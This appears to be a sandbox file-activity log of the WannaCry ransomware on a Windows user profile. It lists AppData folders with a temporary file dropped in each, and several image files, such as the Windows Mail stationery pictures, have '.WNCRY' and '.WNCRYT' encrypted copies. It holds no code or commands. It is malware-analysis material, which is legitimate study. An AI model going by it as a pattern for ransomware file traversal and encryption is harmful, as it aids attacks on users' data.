C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt\~SDFD28.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\~SDFD68.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\~SDFD88.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\~SDFDE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\~SDFE36.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat\~SDFE85.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2\~SDFEC5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras\~SDFF14.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts\~SDFF73.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2\~SD10.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2\~SD30.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2\~SD50.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn\~SD9F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe\~SDCF.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro\~SD10F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru\~SD11F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw\~SD16F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph\~SD1CD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab\~SD1FD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk\~SD23D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk\~SD27C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk\~SD28D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl\~SD28E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq\~SD28F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba\~SD290.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs\~SD291.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs\~SD2FF.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv\~SD36E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw\~SD3BD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta\~SD3FC.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te\~SD47A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg\~SD49A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl\~SD4CA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th\~SD558.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti\~SD5C6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm\~SD615.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za\~SD645.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr\~SD6A4.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt\~SD6F3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug\~SD713.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab\~SD743.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk\~SD764.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur\~SD7A3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz\~SD7E3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi\~SD7F3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo\~SD813.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za\~SD814.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng\~SD854.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn\~SD874.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw\~SD885.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za\~SD8A5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\~SD8B6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\*
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\~SD914.tmp
C:\Users\user\AppData\Local\Microsoft\PlayReady\*
C:\Users\user\AppData\Local\Microsoft\PlayReady
C:\Users\user\AppData\Local\Microsoft\PlayReady\~SD944.tmp
C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage\*
C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage
C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage\~SD974.tmp
C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig\*
C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig
C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig\~SD994.tmp
C:\Users\user\AppData\Local\Microsoft\Vault\*
C:\Users\user\AppData\Local\Microsoft\Vault
C:\Users\user\AppData\Local\Microsoft\Vault\~SD9C4.tmp
C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\*
C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\~SD9C5.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\*
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\~SD9C6.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\1024\*
C:\Users\user\AppData\Local\Microsoft\Windows\1024
C:\Users\user\AppData\Local\Microsoft\Windows\1024\~SD9C7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\1033\*
C:\Users\user\AppData\Local\Microsoft\Windows\1033
C:\Users\user\AppData\Local\Microsoft\Windows\1033\~SD9C8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\*
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\~SD9C9.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW\*
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW\~SD9CA.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\*
C:\Users\user\AppData\Local\Microsoft\Windows\Burn
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\~SD9DB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\*
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\~SD9DC.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\*
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\~SD9DD.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\*
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\~SD9DE.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer\*
C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer
C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer\~SD9DF.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\*
C:\Users\user\AppData\Local\Microsoft\Windows\History
C:\Users\user\AppData\Local\Microsoft\Windows\History\~SD9E0.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\*
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\~SD9E1.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806\*
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806\~SD9F2.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\*
C:\Users\user\AppData\Local\Microsoft\Windows\History\Low
C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\~SD9F3.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\*
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\~SD9F4.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\*
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\~SD9F5.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291\*
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291\~SD9F6.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\*
C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones
C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\~SD9F7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\*
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\~SD9F8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\*
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\~SDA18.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Themes\*
C:\Users\user\AppData\Local\Microsoft\Windows\Themes
C:\Users\user\AppData\Local\Microsoft\Windows\Themes\~SDA77.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\*
C:\Users\user\AppData\Local\Microsoft\Windows\WebCache
C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\~SDA87.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER
C:\Users\user\AppData\Local\Microsoft\Windows\WER\~SDAC7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\~SDAF7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\~SDB26.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\~SDB37.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df\~SDB57.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4\~SDB68.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7\~SDB88.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2\*
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2\~SDBB8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Live\*
C:\Users\user\AppData\Local\Microsoft\Windows Live
C:\Users\user\AppData\Local\Microsoft\Windows Live\~SDBD8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\*
C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici
C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\~SDBD9.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\*
C:\Users\user\AppData\Local\Microsoft\Windows Mail
C:\Users\user\AppData\Local\Microsoft\Windows Mail\~SDBEA.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\*
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\~SDBEB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new\*
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new\~SDC3A.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\*
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\~SDC7A.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Media\*
C:\Users\user\AppData\Local\Microsoft\Windows Media
C:\Users\user\AppData\Local\Microsoft\Windows Media\~SDEFB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\*
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\~SDEFC.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\*
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\~SDF6B.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\~SDF7B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\*
C:\Users\user\AppData\Local\Microsoft_Corporation
C:\Users\user\AppData\Local\Microsoft_Corporation\~SDF9B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\*
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\~SDFCB.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\*
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0
